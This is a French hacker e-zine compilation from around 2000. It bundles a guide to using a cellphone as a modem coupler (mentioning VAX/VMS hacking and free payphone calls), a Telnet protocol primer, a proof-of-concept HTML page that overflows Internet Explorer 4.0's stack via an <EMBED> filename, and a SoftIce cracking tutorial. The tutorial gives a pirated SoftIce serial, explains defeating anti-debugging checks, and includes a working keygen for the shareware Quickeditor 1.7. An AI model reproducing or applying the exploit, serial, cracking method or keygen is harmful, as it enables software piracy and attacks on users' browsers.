Fondamentalement, ce que vous avez fait est transformer votre téléphone de
bureau en dispositif acoustique de type
coupleur. Pour utiliser le dispositif, suivez simplement les instructions
ci-dessous.
1. Branchez votre double prise de téléphone à votre téléphone. Branchez votre
modem dans l' autre prise.
2. Laissez votre téléphone décroché, jusqu' à ce que la ligne soit morte
(c.-à-d. jusqu' à ce que ca sonne occupé).
3. Composez le numéro de modem que vous voulez appeler sur votre portable, et
pressez OK.
4.1. Si vous voulez composer un numéro de modem type bbs ou vax/vms, tapez Atd
dans votre terminal et pressez entrer.
Votre modem devrait maintenant attendre un signal convoyeur de votre téléphone
cellulaire.
4.2. Si vous voulez composer le numéro d' un provider internet, configurez votre
acces réseau distant en connexion
manuelle, cela permet à l' utilisateur de composer manuellement sur le téléphone
connecté sur votre modem le numéro
à composer, puis lorsque le numéro est composé, cliquez sur 'connexion', et
votre modem se connectera tout seul comme
un grand à la porteuse.

Diagramme du dispositif: __
: :
: :
________:__:_
______ : :
/ : /:: ::::: :
/ :---+ +--------------: :: ::::::: : haut-parleur
/ :-+ : : +------------: :: ::::: :
: ____: : : : : \:: _________ :
: / : : : : : : : :
: : : : : : : :_________: :
: : : : : : : :
: : : +-- : : ---------+ : [1][2][3] :
: : +---- : : -------+ : : [4][5][6] :
: : : : : : : [7][8][9] :
: : : : : : : [*][0][#] :
: : : : : : : _ _ _ :
: \____ : : : : : [_][_][_] :
: : : : : : /:: :
\ :-------+ : : +-: :: ::: : microphone
\ :---------+ +---: :: ::: :
\______: \:: :
: :_____________: :
: telephone cellulaire :

telephone de bureau Comment cela fonctionne:
Le signal convoyeur du modem à distance sera envoyé du haut-parleur de votre
téléphone cellulaire et dans le
microphone du combiné téléphonique. Votre modem recevra toutes les données
envoyees dans le combiné téléphonique
après que la commande Atd ait été émise (respectivement, que vous ayez lance la
connexion en mode manuel de
l'acces reseau distant pour le net).
De la même manière, tous les signaux convoyeurs de votre modem seront envoyés du
haut-parleur du combiné téléphonique
vers le microphone du téléphone cellulaire. Au moment ou je vous ecris, je ne me
suis pas connecte a des vitesses plus
elevees que 2400 bauds, mais ceux utilisant de bons portables et de bons reseaux
(la, on comprend l' utilite du son
Digital ;) ne devraient avoir aucun probleme pour se connecter à plus hauts
débits (pas du 14.4 kan meme!).
Je n'ai pas écrit ce texte pour que les gens l'employent a transférer de grandes
quantités de données a grande
vitesse. C'est simplement un guide pour expliquer à quel point il est facile
d'utiliser n'importe quel téléphone
cellulaire avec un modem. 2400 bauds peuvent être lents, mais il est très bien
pour hacker des vax/vms, appeler
votre BBS souterrain favori ou transferer des fichiers des textes, envoyer des
emails...
Vous pouvez egalement utiliser ce dispositif pour connecter un ordinateur
portable relie a un modem PCMCIA sur le
combiné d' une cabine téléphonique. L' avantage serait dans ce cas de pouvoir
émuler une carte de telephone, pour
ne rien payer (allez BOB, au travail!!).
Je vous fais confiance pour adapter cette technique a vos besoins...


\ _:// \\:_ /
_)\\//(_ _)\\//(_
---------- \\_o\/o_/ CyRiUsViRuS \_o\/o_// ----------
|||||| 2000 ||||||
'||||' '||||'
CyriuSoft (c)
contact me : <a onmouseover="window.status='Add cyriusvirus@yahoo.fr to Your Address Book';return true;" onmouseout="window.status='';return true;" href="addressbook.cgi?un=asmodeus&uid=RIFd9icd3gT3UCAvz4tX8KgW2U&aa=create_alias&ea=cyriusvirus@yahoo.fr&nf=0">cyriusvirus@yahoo.fr</a>

_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________



*********************
* Telnet decortique *
*********************

Auteur : tRaSH

- Telnet décortique : telnet permet une communication bidirectionnel (A=> B et
B=> A), sur une base d'octet de 8 bits.
Les connections sont en TCP intercale de séquences telnet. Ce protocole est base
sur trois principes :
1. le network virtual terminal, qui permet un échange standard sans pour cela
retenir toutes les spécifications de
l'autre machine
2. Les options négociées, "do, don't, will, won't " (je fais, je ne fais pas,
fais, ne fais pas) sert pour, par
exemple, un terminal récent et un plus ancien, de profiter de toutes le confort
du récent sans en rester pour
cela a du nvt.
Voicis un schéma d'une demande d'option x :A :Do x => B
B :will x => A, alors l'option x est accepte et mise en action par les deux
unités.
3. Une vue symétrique de chaque extrémité (terminal,…), c-à-d que chaque unité
suit des regles pour eviter des erreurs
que voicis :
- chaque unite ne doit envoyer une requete que pour le changement d'option, pas
pour, par indique dans quel mode on se trouve
- si une unite recoit une requete lui demandant de changer de mode alors qu'il
est deja dans ce mode, cette unite ne
doit pas repondre pour eviter les boucles infinies
- si une requete pour modifier le mode dont les donnes doivent etre traite pour
la transmission est envoyee, elle
doit etre emise a l'endroit où la transmission change de mode.
De nombreuses requete d'options vont surement s'entrecroiser lors d'un
connection, chacune des deux unite essayant
d'obtenir le mellieur service de l'autre unite.

_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________


*************************************************
* Buffer Overrun de Microsoft Internet Explorer *
*************************************************

Auteur : wHyAnGeL
Date : 04.08.00
Titre : Buffer overrun de Microsoft Internet Explorer (MSIE)
Tout d'abord qu'est-ce qu'un buffer overrun ? Le buffer c'est la zone pour le stickage temporarire dans la mémoire de la machine . Et l'overrun c'est un envahissement, un débordement. Combinez les deux et vous avez la réponse.

Microsoft Internet Explorer (la version 4.0, je n'ai pas testé les autres) peut être crashé et enventuellement faire exécuter un code arbitraire avec le tag <EMBED>.

Le voici : <EMBED SRC=file://C|/A.ET_200_AUTRES_CARACTERES_ICI_>

Il ouvre une boîte de dialogue et ferme IE 4.0.

Il semble que cette longue extension de fichier cause un overrun au stack. (note : le stack c'est la zone dans la mémoire où il est possible de stocker de l'information et de la récupérer en ordre inverse à celui de l'entrée).

Maintenant, le stack est complétement crashé avec ses propres valeurs, EIP aussi et CS=SS.
On pourrait certainement construire une string (ligne) et l'exécuter à partir de la machine client, c'est à dire vous.

A vous de voir ce que vous pouvez faire avec cet exploit.

-----------------------coupez ici et enregistez sous
crashmsie.html---------------------
<HTML>
Trying to crash IE 4.0
<EMBED
SRC=file://C|/A.012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789>
40
80 160 170 180 190 200
</HTML>

-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________





****************************
* Tutorial de cracking n°3 *
****************************

Auteur : GRIm@

-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-
- «««««««« ¡ Underground Production ¡ »»»»»»»
-
- LES NEWBIES D'AUJOURD'HUI SONT LES 3L33T3 DE DEMAIN
-
-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ
<--------------------TAILLE IDEALE,800x6000------------------------->


CRACKING_BEGINNER n°03 by GRIm@, L'Apprenti Sorcier


0)INTRO:
££££££££
Salut, nous revoilà parti pour la suite de nos aventures !! Au menu cette
fois-ci:
- Installer SoftIce...
- Configurer SoftIce..
- Commandes dans SoftIce...
- Les indispensables de SoftIce...
- SoftIce, SoftIce, SoftIce....
- Un Chti crack pour rester dans le mouvement
NB: Si vous ne connaissez rien au cracking, il est indispensable de lire les n°
01 et 02 (et
même comme ca, ca vas être DUR ! =-).. )

1) SoftIce en lui-même:
£££££££££££££££££££££££
Hé oui, vous aez compris, aujourd'hui nous allons parler de SoftIce... Mais
qu'est ce donc que SoftIce ?
Sous ce nom étrange au consonnace étrange, se cache l'outils préféré des
crackerz,
LE débuggeur absolu... Hé oui, car SoftIce est un débuggeur, il permet de tracer
des programmes directement
pendant leurs éxécution tout en voyant leur code assembleur... Cet outil est
indispensable, et même s'il fait
parfois peur aux newbies, il vous rendra de grand service...
En fait SoftIce doit se lancer AVANT windoze, il sert en quelque sorte de
sous-couche à celui-ci ce qui lui permet
d'assurer des fonctions de débuggage trés pratiques et nottament des breakpoint
sur les APIs...

2) SoftIce Install et Config
££££££££££££££££££££££££££££
On vas commencer par le début, l'installer (pour le trouver c'est facile,
www.numega.com): Il vous demande d'abord un
chti sérial, facile voici pour la version 4.01: 5103-00009B-9B...
Aprés, vous décider du répertoire d'installation ainsi que du type de config,
choissisez selon votre config
(perso j'vous conseille d'utiliser les vga driver default pour votre carte
graphique, sinon vous serez emmerdé !)...
Quand il demande si vous voulez modifier autoexec.bat, dites non ! Aprés
l'install, aller ajouter ecs lignes à la fin
de votre autoexec.bat:

------------------CUT CUT CUT------------------
@echo off
C:\WINDOWS\COMMAND\choice /T:n,05 Lancer SoftIce ?
if errorlevel 2 goto fin
c:\SOFTICE\WINICE.EXE rem : il faut remplacer le chemin par celui de l'install
:fin
------------------CUT CUT CUT------------------

Pour ceux qui sont pas fort en scripting, au lancement, l'ordi demandera si vous
voulez lancer SoftIce et au bout
de 5 sec il choisira non (comme ca pas besion de rester à coté de l'ordi au
moindre reboot...). Une fois ceci fait,
il ne vous restera qu'a redémarrer votre ordinateur et à choisir oui quand il
demandera si on veut avoir SoftIce
(sinon à quoi ca sert ?!)...
Tant que vous y êtes, vous devez aller aussi modifier dans le rep d'install le
fichier winice.dat selon votre config
et vos désir. Voici un exemple qui devrais foncionner:

------------------CUT CUT CUT------------------
PENTIUM=ON
NMI=ON
ECHOKEYS=OFF
NOLEDS=OFF
NOPAGE=OFF
SIWVIDRANGE=ON
THREADP=ON
LOWERCASE=OFF
WDMEXPORTS=OFF
MONITOR=0

PHYSMB=64 ; Mettre le nb de RAM
SYM=1024
HST=256
TRA=8
MACROS=32
DRAWSIZE=2048

INIT="LINES 60;CODE ON; X; FAULTS OFF;" ; Initialisation

F1="h;"
F2="^wr;"
F3="^src;"
F4="^rs;"
F5="^x;"
F6="^ec;"
F7="^here;"
F8="^t;"
F9="^bpx;"
F10="^p;"
F11="^G @SS:ESP;"
F12="^p ret;"
SF3="^format;"
CF8="^XT;"
CF9="TRACE OFF;"
CF10="^XP;"
CF11="SHOW B;"
CF12="TRACE B;"
AF1="^wr;"
AF2="^wd;"
AF3="^wc;"
AF4="^ww;"
AF5="CLS;"
AF8="^XT R;"
AF11="^dd dataaddr->0;"
AF12="^dd dataaddr->4;"
CF1="altscr off; lines 60; wc 32; wd 8;"
CF2="^wr;^wd;^wc;"

; WINICE.DAT
; (SIW95\WINICE.DAT)
; for use with SoftICE Versions greater than 3.0 (Windows 95)

; *************************************************************************
; If your have MORE than 32MB of physical memory installed, change
; the PHYSMB line to the correct # of Megabytes.
; If you have LESS than 32MB you can save a bit of memory by
; specifying the correct # of Megabytes
; Example: PHYSMB=32
; *************************************************************************
; ***** Examples of sym files that can be included if you have the SDK *****
; Change the path to the appropriate drive and directory
;LOAD=c:\windows\system\user.exe
;LOAD=c:\windows\system\gdi.exe
;LOAD=c:\windows\system\krnl386.exe
;LOAD=c:\windows\system\mmsystem.dll
;LOAD=c:\windows\system\win386.exe
; ***** Examples of export symbols that can be included *****
; Change the path to the appropriate drive and directory
EXP=c:\windows\system\vga.drv
EXP=c:\windows\system\vga.3gr
EXP=c:\windows\system\sound.drv
EXP=c:\windows\system\mouse.drv
EXP=c:\windows\system\netware.drv
EXP=c:\windows\system\system.drv
EXP=c:\windows\system\keyboard.drv
EXP=c:\windows\system\toolhelp.dll
EXP=c:\windows\system\shell.dll
EXP=c:\windows\system\commdlg.dll
EXP=c:\windows\system\olesvr.dll
EXP=c:\windows\system\olecli.dll
EXP=c:\windows\system\mmsystem.dll
EXP=c:\windows\system\winoldap.mod
EXP=c:\windows\progman.exe
EXP=c:\windows\drwatson.exe
; ***** Examples of export symbols that can be included for Windows 95 *****
; Change the path to the appropriate drive and directory
EXP=c:\windows\system\kernel32.dll
EXP=c:\windows\system\user32.dll
EXP=c:\windows\system\gdi32.dll
EXP=c:\windows\system\comdlg32.dll
EXP=c:\windows\system\shell32.dll
EXP=c:\windows\system\advapi32.dll
EXP=c:\windows\system\shell232.dll
EXP=c:\windows\system\comctl32.dll
EXP=c:\windows\system\crtdll.dll
EXP=c:\windows\system\version.dll
EXP=c:\windows\system\netlib32.dll
EXP=c:\windows\system\msshrui.dll
EXP=c:\windows\system\msnet32.dll
EXP=c:\windows\system\mspwl32.dll
EXP=c:\windows\system\mpr.dll
------------------CUT CUT CUT------------------

3) SoftIce Comment ca marche ?
££££££££££££££££££££££££££££££

3.1) Overlook
µµµµµµµµµµµµµ
Bon maintenant finis de rigoler on vas regarder un peux comment marche ce fameux
monstre... Quand vous êtes dans
windob, pour basculer sous softice, il suffit de faire CTRL-D (et inversément
pour revenir à windob... N'ayez sourtout
pas peur en voyant la "gueule" de l'interface, elle est certes sobre, mais trés
ergonomique et puissante... La fenêtre
est séparée en trois partie principale, (du moins normalement, sinon essayer ces
commandes: wr on, wd on,...) la
premiére c'est celle des registres, vous vous rapelez, oui ces trucs bizzare qui
on des nom zarbi commme eax, ebx,
ecx, etc (ca c'est pas un registre)... Bon ben dans cette fenêtre on peut suivre
en direct l'êtat des registres, ou
autrement dit, leurs valeurs (On y voit également les flags, mais j'en parle
pas).
La deuxiéme fenêtre, contient l'EIP (c'est le n° de la ligne ou on est dans le
prog) ansi que les instructions en
hexa et en assembleur (si c'est pas le cas, essayer "code on"). On peut y suivre
en direct le déroulement du
programme et éventuellement changer certaine instructions. On peut normalement y
voir aussi le nom du programme
qui est en train d'être tracé. La troisiéme fenêtre est celle des commandes,
elle permet d'entrer et de voir
l'historiques des commandes. SoftIce y affiche aussi diverses informations sur
le chargement et le déchargement
d'objet. Softice est aussi livré avec un utilitaire trés utile, le Loader. Ce
programme fonctionne sous win et
permet de lancer des applications, jusque là c'est pas extraordinaire, mais ce
qui est pratique, c'est que les
apps lancée avec le loader s'arréte toute seule sur leur premiére instructions
et vous vous retrouvez dans
SoftIce pour pouvoir la tracer depuis le début...

3.2) Commandes de base
µµµµµµµµµµµµµµµµµµµµµµ
Il existe plusieurs commandes que vous devez ABSOLUMENT connaitre par coeur, en
voici quelques une expliquées:
F5 Permet de re-lancer le programme (la même chose que CTRL-D)
F6 Permet de placer le focus (votre curseur) sur le code ou de revenir dans
les instructions
F8 Permet de tracer (avancer ligne par ligne) le programme. Quand on
rencontre un call, on
rentre à l'intérieur, et donc on trace TOUTES les instructions
F10 Permet de tracer (avancer ligne par ligne) le programme. Quand on
rencontre un call, on
ne rentre pas à l'intérieur, et on saute sur la prochaine ligne sans voir
les instrucions
F12 Permet de tracer tout seul jusqu'au prochain ret (quand on est dans une
routine (un call)
et que on veut revenir à l'appel)
bpx Permet de poser un breakpoint sur une ligne ou une API
bl Permet d'afficher les breakpoint
bc Permet d'effacer un breakpoint (faire bc [n° du breakpoint])
bd Désactiver un breakpoint
be Activer un breakpoint
r fl Permet d'inverser un flag, souvent utilisé avec r fl z pour transformer un
JE en un JNE et
inversément.
a Permet d'éditer le code assembleur. On peut remplacer les instructions du
programmes par de
nouvelles instructions (effectif seulement en mémoire, quand le prog se
ferme, les modifs
s'effacent)
line Permet de choisir le nombre de ligne d'affichage (conseil, minimum LINES
60)
ver La version de SoftIce
hboot Permet de relancer l'ordi (utile en cas de plantage)
help Permet d'affciher toutes les commandes ainsi qu'une explication sur
celle-ci: [command] /?)

Bon, je crois que c'est tout, remarquez que cette liste est loin dêtre
exaustive...

4) Utiliser SoftIce
£££££££££££££££££££
Bien, bien, on vas se faire un exemple théorique (en ce sens que ce n'est pas un
exemple réel). On veut par exemple
cracker un programme qui aprés 30 jours nous affiche un message puis quitte. La
technique du Dead-Listing
(déssasemblage avec WDAsm et recherche dans les strings ref) n'ayant rien donné
(ca arrive assez souvent
malheureusement), on vas essayer avec SoftIce. Tout d'abord, on vas réfléchir
comment on vas procéder: On pourrait
utiliser le loader et tracer depuis le début, mais ce n'est pas une bonne iddée,
car il se peut qu'il y ai plein de
routine avant que le message s'affiche. Non, réfléchissez à ce que je vous ai
dit tantot, avec SoftIce on peut poser
des breakpoint sur les API de windows (ce sont les fonctions de windows qu'un
prog peut utiliser). Or, quand notre
prog nous affiche notre message de 30 jour dépassé, il utilise une fonction de
windows trés usitée par (presque)
tous les programmes, l'API messageboxa. On vas donc piéger le prog par là ! Pour
ce faire, il faut basculer sous
SoftIce (CTRL-D) puis faire : bpx messageboxa Ensuite vous pouvez revenir sous
win (re CTRL-D ou F5). A ce moment,
il ne reste plus qu'à lancer notre prog, et on se retrouve instantanément sous
SoftIce qui nous afiche qu'un prog à
apellé la fonction messageboxa. Bon tout ca c'est cool, mais c'est pas génial,
car on est pas dans notre prog, en
effet on se trouve dans kernel32 (ou user32 je sais plus) qui est le noyau de
windows. Pour revenir dans le prog
qui a appelé messageboxa, y'a pas 36 solutions, il faut utiliser F12 et souvent
plusieurs fois. Aprés chaque F12,
vous devriez voir que le prog actuellement visible change, il vous faut

  

continuer a faire F12 jusqu'à ce que vous
soyez revenu dans le prog qui nous inréresse. Une fois là, vous devriez vous
trouvez juste sur l'instruction aprés
l'appel à l'API. A ce moment la, il ne reste plus qu'a retrouver le test
(souvent juste au dessus) qui nous aurait
éviter ce désagréable message d'erreur et qui aurait permis au prog de
continuer. Une fois celui-ci trouvé, il ne
vous reste plus qu'à noter son adresse, puis à aller avec votre éditeur hexa
favoris modifier le saut en conséquence...

5) Les Outils de SoftIce
££££££££££££££££££££££££

5.1) Le Loader
µµµµµµµµµµµµµµ
Bon, je vous en ai déjà parlé de ce truc, c'est le programme qui est livré avec
SoftIce et qui permet de lancer un prog
pour le tracer avec SoftIce dés l'entry point (l'entry point, c'est là ou le
programme exécute la premiére ligne)...
Cet outil est assez utile (même si parfois il ne marche pas, mais ca on en
reparle au n°4...) et trés simple
d'utilisation. Pour lancer un programme, il suffit de faire file/load module,
puis de séléctionner un exécutable.
Ensuite, il ne reste qu'a clicker sur l'icône Load dans la barre d'icône pour
que le programme se lance (il se peut
qu'un message d'erreur apparaisse disant qu'une erreur est apparue lors de la
traduction des symboles, répondez oui
et n'y pensez plus (moi j'ai ca pour tous les progs...).

5.2) Frog's Ice
µµµµµµµµµµµµµµµ
Comment parler de SoftIce sans parler de frog's ice... Frog 's Ice permet
d'empécher la détection de SoftIce par
certain programme (voir le point 6). Il est également trés simple d'utilisation,
il suffit de le lancer et il se
cache dans la barre d'icone et plus besoin de rien faire... Il logge tous les
tentatives de détection et les fait
échouer automatiquement... Le must, il se protége lui-même contre la
détection... Vous pouvez aussi être prévenu
par un joli écran bleu de la mort de toutes tentative de détection de SoftIce...
La version 1.00 vient de sortir,
donc n'hésitez surtout pas à aller le downloader, c'est un indispensable !

5.3) IceDump
µµµµµµµµµµµµ
IceDump, comme son nom l'indique est un dumper intégré à SoftIce, c'est à dire,
un programme qui vas copier une
partie de la mémoire pour le remettre dans un fichier... Dans sa derniére
version (icedump 6.016 & nticedump
1.8 2000/04/27), il est parfaitement intégré à SoftIce, en lui ajoutant des
commandes et avec ses multiples
options (y'a même un player MP3)... Bref, IceDump est un programme à posséder,
même si son utilisation reste
rare avec le fameux ProcDump...

6) Détection de SoftIce
£££££££££££££££££££££££
A cause de son immense succés auprés des crackerz, certain malfaisant personnage
ont eu l'idée d'intégrer une
détection de SoftIce dans leurs produits, empéchant ainsi l'exécution du prog si
le débuggeur était en mémoire...
Mais gràce à un certain +Frog 's Print (une 3l33t3 comme y'en a pas deux,
francophone en plus), un porg nommé
Frog's Ice est apparu, faisant disparaitre ainsi ces quelques petit inconvénient
(Voir 5.2)... Je ne pourrais
pas parler ici de toutes les méthode anti SoftIce, mais je vais vous parlez de
la plus connue, appelée MeltIce.
MeltIce historiquement est la premiére méthode de détection, puisque c'est celle
que le Loader utilisait pour
savoir si SoftIce était présent, quelque programmeurs rusé ont eu envie de
copier cette technique et ainsi est
apparu MeltIce. Cette technique est assez simple, elle utilise l'API
CreateFileA, et lui passe comme argument le
fichier "\.\\SICE". Si softice est en mémoire, l'Api retourne quelque chose,
sinon elle retourne 0 (la valeur de
retour est dans eax). Il suffit aprés au programme de tester eax pour savoir si
SoftIce est là ou pas... Pour se
débarraser de ca, il suffit de poser un breakpoint sur l'APi en faisant bpx
createfilea. Cela peut servir, mais
honnnètement, Frog's Ice est amplement suffisant pour toutes les techniques de
détection (voir sa doc pour plus
d'info...).

7) Un chti crack
££££££££££££££££
Bha, fot bien rester un peux sur de la pratique, pas que de la théorie alors
voici un pti crack
que j'avais fait il y a quelque mois pour [Zone14] (<a target="new" href="http://zone14.cjb.net</a">http://zone14.cjb.net">http://zone14.cjb.net</a>) et
ou j'utilisait
SoftIce pour une des premiére fois... Aller bonne lecture... !

------------CUT CUT
CUT---------------------------------------------------------------

Quickeditor 1.7 Par GRIm@


Nom du Prog: Quickeditor
Version : 1.7
Infection : Nag, fonction protégée
Outils : WDASM et (un peux) SoftIce
Niveau : Facile, Newbies expérimenté


Salut, voici la suite de mes aventures dans le monde du shareware. Alors,
aujourd'hui on s'attaque à Quickeditor,
un petit prog qui permet de créer des film au format Quicktime. Bref, c'est pas
ca qui compte. Aujourd'hui aussi,
et ce pour la premiére fois, j'utiliserai SoftIce.
En fait, étant toujours un newbies, je n'avais jamais réellement utilisé cet
outils, donc si j'me goure quelque part,
soyez indulgent...

Première approche
-----------------
On installe le prog, et on regarde. Un nag au lancement, un menu register. On
essaye un nom bidon, et là, ni message
d'erreur, ni quoi que ce soit, juste les infos qu'on à entré qui s'efface. Mince
alors, on vas pas pouvoir désassembler
le prog et chercher dans les trings,
y'en aura pas ! Comment faire ?

Première Attaque
----------------
On ne se décourage pas, et on décide d'utiliser tout les outils à notre
disposition, à savoir
notre cervaux (trés utile des fois), et SoftIce. Pour ceux qui ne connaisent
absolument rien
de SoftIce, sachez quand même qu'il s'agit d'un déboggeur, et je vous invite à
lire de la
documentation sur celui-ci (dispo sur le net, ou en demand à
<a onmouseover="window.status='Add grima@hotmail.com to Your Address Book';return true;" onmouseout="window.status='';return true;" href="addressbook.cgi?un=asmodeus&uid=RIFd9icd3gT3UCAvz4tX8KgW2U&aa=create_alias&ea=grima@hotmail.com&nf=0">grima@hotmail.com</a>). On lance le
programme avec le Symbol Loader, et SoftIce breake, on est dans le prog.
La-dessus, on appuie
sur F5, et on laise continuer l'exécution. On clicke sur register, on rentre de
fausses infos,
puis avant de clicker sur ok, on bascule dans SoftIce (CTRL-D). Il nous faut
maintenant poser
un breakpoint pour que le programme s'arréte pendant la vérification du sérial.
Une des
solutions reste de mettre un break sur HMEMCPY; c'est plutot radical. Pour ce
faire, il suffit
d'entrer la commande "BPX HMEMCPY". Ensuite, cacher SoftIce (avec un nouveau
CTRL-D), et cliquer
sur le bouton ok. Ca ne tarde pas, SoftIce breake immédiatement et on se
retrouve dans le code.
Seulement voilà, il y a un problème, on est pas dans le code de l'application on
est dans celui
de KERNEL32. Pour revenir dans SoftIce, il suffit d'appuier plusieurs fois sur
F12 pour que le
nom de l'application apparaisent en bas du premier cadre. Une fois que vous y
êtes, il suffit
de tracer avec F9. On arrive vite à un endroit intéressant, au alentour de
00401CD6. Il ne nous
reste qu'a noter l'adresse, et à désassembler le prog avec WDASM. Une fois ceci
fait, vous aller
à l'adresse que vous avez notée, et vous observez ceci:

* Possible Reference to Dialog: DialogID_0084, CONTROL_ID:03EB, ""
|
:00401C23 68EB030000 push 000003EB
:00401C28 55 push ebp

* Reference To: USER32.GetDlgItemInt, Ord:00F4h
|
:00401C29 FF1508654300 Call dword ptr [00436508]
:00401C2F 8D4C2418 lea ecx, dword ptr [esp+18]
:00401C33 6A0F push 0000000F
:00401C35 51 push ecx
:00401C36 8BF8 mov edi, eax

* Possible Reference to Dialog: DialogID_0084, CONTROL_ID:03EC, ""
|
:00401C38 68EC030000 push 000003EC
:00401C3D 55 push ebp
:00401C3E 897C2440 mov dword ptr [esp+40], edi

* Reference To: USER32.GetDlgItemTextA, Ord:00F5h
|
:00401C42 FF15FC644300 Call dword ptr [004364FC]
:00401C48 8BD8 mov ebx, eax
:00401C4A 6683FB06 cmp bx, 0006
:00401C4E 0F8C82000000 jl 00401CD6
:00401C54 6683FF0A cmp di, 000A
:00401C58 7C7C jl 00401CD6
:00401C5A 663BDE cmp bx, si
:00401C5D 7E29 jle 00401C88
:00401C5F 8D7C2418 lea edi, dword ptr [esp+18]

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00401C82(C)
|
:00401C63 8A17 mov dl, byte ptr [edi]
:00401C65 52 push edx
:00401C66 E875460100 call 004162E0
:00401C6B 8BCE mov ecx, esi
:00401C6D 83C404 add esp, 00000004
:00401C70 0FAFC8 imul ecx, eax
:00401C73 8B442414 mov eax, dword ptr [esp+14]
:00401C77 03C1 add eax, ecx
:00401C79 46 inc esi
:00401C7A 47 inc edi
:00401C7B 663BF3 cmp si, bx
:00401C7E 89442414 mov dword ptr [esp+14], eax
:00401C82 7CDF jl 00401C63
:00401C84 8B7C2430 mov edi, dword ptr [esp+30]

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00401C5D(C)
|
:00401C88 663B7C2414 cmp di, word ptr [esp+14]
:00401C8D 7518 jne 00401CA7
:00401C8F 6A01 push 00000001
:00401C91 55 push ebp

* Reference To: USER32.EndDialog, Ord:00B4h
|
:00401C92 FF1510654300 Call dword ptr [00436510]
:00401C98 B801000000 mov eax, 00000001
:00401C9D 5F pop edi
:00401C9E 5E pop esi
:00401C9F 5D pop ebp
:00401CA0 5B pop ebx
:00401CA1 83C41C add esp, 0000001C
:00401CA4 C21000 ret 0010

On vois parfaitement que le prog fait appel à deux APIs, GetDlgItemInt et
GetDlgItemTextA, qui
serve respectivement à retrouver un nombre et un texte d'une boite de dialogue.
A votre avis,
que récupére donc l'application, sinon un code et un nom ? =-). Juste aprés,
l'application
effectue une série de test pour vérifier si le nom faitg au moins 6 caractéres,
et que le code
est plus grand que 10 (y'a aussi une autre valeur testée, mais je sais pas c'est
quoi !).
Ensuite, se trouve une drôle de routine, qui se rappelle elle-même. En gros,
voici en
"pseudo-code" ce que l'app fait:
saisie du nom
Boucle le_nombre_de_lettre
saisie_d'une_lettre
Appel d'une fonction(lettreposition) /* cette fonction est un peux longue, sinon
je l'aurais
/* mise, elle recoit en argument une
lettre, et renvoie
/* un chiffre pour cette lettre
multiplication de la valeur récupérée par la position dans la chaine /* la 1er
lettre=position 0
incrémentation d'une variable avec la valeur précédante
continue_boucle si_nombre_de_lettre différent_de nombre_total_de_lettre
test valeur_entrée, valeur calculée /* on teste le code entré avec le code
calculé.

En gros, le schéma n'est pas trés difficile, il suffit de connaitre la valeur
assignée à chaque
lettre puis de multiplier cette valeur par la position de chaque lettre dans le
nom, et enfin
d'additionner toute ces valeurs pour obtenir un sérial. Comme c'est assez
simple, nous allons
réaliser un petit KeyGen. Voici les sources de ce KeyGen fait en Visual Basic,
text1 représente
l'entrée du nom, et text2, le sérial:

Private Sub Command1_Click()
Dim longeur As Integer, position As Integer, valeur As Integer
Dim caractere As String, serial As Integer
If Text1.Text = "" Then Exit Sub
longeur = Len(Text1.Text)
If longeur < 6 Then
MsgBox "Votre nom doit faire au moins 6 caractére", vbApplicationModal, "Espéce
de Lamer ;-)"
Exit Sub
End If
Do Until position = longeur
caractere = Mid(Text1.Text, position + 1, 1)
valeur = GetNumer(caractere)
valeur = valeur * position
serial = serial + valeur
position = position + 1
Loop
Text2.Text = Str(serial)
End Sub

Private Function GetNumer(lettre As String) As Integer
Select Case UCase(lettre)
Case "A"
GetNumer = 1
Case "B"
GetNumer = 6
Case "C"
GetNumer = 5
Case "D"
GetNumer = 4
Case "E"
GetNumer = 2
Case "F"
GetNumer = 6
Case "G"
GetNumer = 7
Case "H"
GetNumer = 12
Case "I"
GetNumer = 9
Case "J"
GetNumer = 10
Case "K"
GetNumer = 19
Case "L"
GetNumer = 12
Case "M"
GetNumer = 13
Case "N"
GetNumer = 14
Case "O"
GetNumer = 15
Case "P"
GetNumer = 3
Case "Q"
GetNumer = 7
Case "R"
GetNumer = 18
Case "S"
GetNumer = 19
Case "T"
GetNumer = 15
Case "U"
GetNumer = 21
Case "V"
GetNumer = 16
Case "W"
GetNumer = 3
Case "X"
GetNumer = 8
Case "Y"
GetNumer = 2
Case "Z"
GetNumer = 56
Case Else
GetNumer = 0
End Select
End Function

Vous voyez que la fonction GetNumer est exactement la même que celle en
assembleur du programme. Les lettres
majuscules et minuscules recoivent la même valeur, et certaine lettres ont
également la même valeur. J'ai mis
le KeyGen compilé dans le zip pour ceux qui n'ont pas VB (beaucoup d'entre vous
normalement)(comment ca non !?! ;-).
S'il n'y est pas, aller voir sur le site de Zone14, ou demander-le à
<a onmouseover="window.status='Add grima@hotmail.com to Your Address Book';return true;" onmouseout="window.status='';return true;" href="addressbook.cgi?un=asmodeus&uid=RIFd9icd3gT3UCAvz4tX8KgW2U&aa=create_alias&ea=grima@hotmail.com&nf=0">grima@hotmail.com</a>.

Voilà qui termine nos aventure pour aujourd'hui, mais point d'inquiétude, i'll
be back soon...
Je dédie ce crack à Synt, paske j'ai gagné notre paris ;-)... About, je voudrais
dire ma grande
déception et ma profonde tristesse par rapport à la fermeture de MadChat. La
scéne vient d'en
prendre un coup, mais pas d'inquiétude, nous sommes tous là pour continuer et
perséverer pour
faire un monde meilleur... Sur ce, bye all...

GRIm@ , l'Apprenti Sorcier

-------------------------END CUT - END CUT - END CUT
-------------------------------

8) Adresses utiles
££££££££££££££££££
